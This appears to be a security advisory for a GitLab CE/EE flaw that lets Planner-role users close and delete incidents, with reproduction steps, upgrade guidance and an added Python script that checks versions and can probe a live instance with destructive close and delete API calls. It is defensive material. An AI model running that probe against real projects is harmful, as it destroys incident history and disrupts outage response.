GitLab CE/EE Improper Authorization Vulnerability in Incident Management

Vulnerability

An improper authorization flaw affects GitLab Community Edition (CE) and Enterprise Edition (EE) in all 17.7 releases prior to 17.7.4 and all 17.8 releases prior to 17.8.2. A user holding the Planner role can close and delete incidents, bypassing the role-based access control (RBAC) checks that GitLab's documented permission model prescribes: closing an incident should require at least the Reporter role, and deleting one should require the Owner role.

Impact

A project member who holds only the Planner role can close active incidents, which removes them from responders' view while the underlying problem persists and can prolong an outage. The same user can delete incidents outright, destroying the incident history that audits and post-incident accountability depend on. No elevated privilege is needed; membership in the project with the Planner role is sufficient.

Reproduction

To reproduce this vulnerability, log into GitLab as a user who holds the Planner role in a project. Open the project's Incidents section, select an active incident, and attempt first to close it and then to delete it. On an affected version both actions succeed, even though the Planner role does not carry either permission according to the documentation; on a patched version both are refused. Use a throwaway incident in a test project, since a successful deletion is irreversible.

Remediation

Upgrade to GitLab 17.7.4 or 17.8.2, the releases in which this issue is fixed. Instances on a 17.7.x release earlier than 17.7.4, or on 17.8.0 or 17.8.1, remain affected. Until the upgrade is applied, an interim mitigation is to restrict the Planner role to trusted members in projects that track incidents.
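The following script is an added example for the Reproduction and Remediation sections above; it is not part of the advisory and not GitLab's own code. It decides offline whether a version string falls in the affected ranges, and it can optionally probe a live instance by attempting the close and delete actions with a Planner-role token through the REST issues API and reporting whether they are refused. It assumes, which the advisory does not state, that the REST path is subject to the same authorization checks as the UI; the instance URL, token, project id and incident iid are placeholders.

```python
"""Added example (not from the advisory or from GitLab): offline version
check against the affected ranges, plus an optional live RBAC probe.

Assumptions not stated in the advisory: the REST issues API shares the
authorization checks of the UI path; base_url, token, project_id and
incident_iid are caller-supplied placeholders.
"""
import json
import urllib.error
import urllib.request

# First fixed release per affected minor line, taken from the advisory text.
FIXED_IN = {(17, 7): (17, 7, 4), (17, 8): (17, 8, 2)}


def parse_version(version):
    """Turn a GitLab version string such as '17.7.3-ee' into (17, 7, 3).

    GET /version returns strings like '17.8.1-ee' or '17.7.2-pre'; the
    edition or pre-release suffix after '-' is dropped.
    """
    core = version.strip().split("-")[0]
    nums = []
    for part in core.split(".")[:3]:
        digits = "".join(ch for ch in part if ch.isdigit())
        nums.append(int(digits) if digits else 0)
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)


def is_affected(version):
    """True if the version lies in 17.7 < 17.7.4 or 17.8 < 17.8.2."""
    v = parse_version(version)
    fixed = FIXED_IN.get(v[:2])
    if fixed is None:
        # Minor lines the advisory does not list (older than 17.7, or
        # 17.9 and later) are treated as not affected by this advisory.
        return False
    return v < fixed


def evaluate_probe(close_status, delete_status):
    """Interpret the HTTP status codes of the two Planner-role actions.

    A correctly enforced Planner role gets 403 on both. Any 2xx means the
    action went through and the RBAC check was bypassed. Other codes
    (401 bad token, 404 wrong id, ...) are flagged as inconclusive.
    """
    def allowed(code):
        return 200 <= code < 300

    def conclusive(code):
        return allowed(code) or code == 403

    return {
        "close_allowed": allowed(close_status),
        "delete_allowed": allowed(delete_status),
        "enforced": close_status == 403 and delete_status == 403,
        "inconclusive": not (conclusive(close_status)
                             and conclusive(delete_status)),
    }


def _api(base_url, token, method, path, payload=None):
    """Minimal REST call (hypothetical helper); returns the HTTP status."""
    headers = {"PRIVATE-TOKEN": token}
    body = None
    if payload is not None:
        body = json.dumps(payload).encode()
        headers["Content-Type"] = "application/json"
    req = urllib.request.Request(base_url.rstrip("/") + "/api/v4" + path,
                                 data=body, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def probe_planner_rbac(base_url, planner_token, project_id, incident_iid):
    """Try to close, then delete, one incident as a Planner-role user.

    Run only against a throwaway incident in a test project: on an
    affected instance the DELETE succeeds and cannot be undone.
    """
    issue_path = f"/projects/{project_id}/issues/{incident_iid}"
    close_status = _api(base_url, planner_token, "PUT", issue_path,
                        {"state_event": "close"})
    delete_status = _api(base_url, planner_token, "DELETE", issue_path)
    result = evaluate_probe(close_status, delete_status)
    result.update(close_status=close_status, delete_status=delete_status)
    return result


def check_instance_version(base_url, token):
    """Fetch GET /version and report whether it is in an affected range."""
    req = urllib.request.Request(base_url.rstrip("/") + "/api/v4/version",
                                 headers={"PRIVATE-TOKEN": token})
    with urllib.request.urlopen(req, timeout=15) as resp:
        version = json.load(resp)["version"]
    return version, is_affected(version)


if __name__ == "__main__":
    # Offline demonstration on constructed version strings.
    for v in ("17.7.3-ee", "17.7.4-ee", "17.8.1-ce", "17.8.2", "17.9.0"):
        print(v, "affected" if is_affected(v) else "not affected")
    # Live use with placeholders; fill in before running against an instance:
    # print(check_instance_version("https://gitlab.example.com", "<admin-token>"))
    # print(probe_planner_rbac("https://gitlab.example.com", "<planner-token>", 42, 7))
```

The version check is the cheap first step and needs only a token able to read /version; the live probe is a destructive confirmation and belongs in a disposable project. Treat any 2xx from either call as a failed RBAC check, and inspect inconclusive codes rather than reading them as a pass.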

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 7.3
impact: 2.5
exploitability: 6.6
remediation: 7.7
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.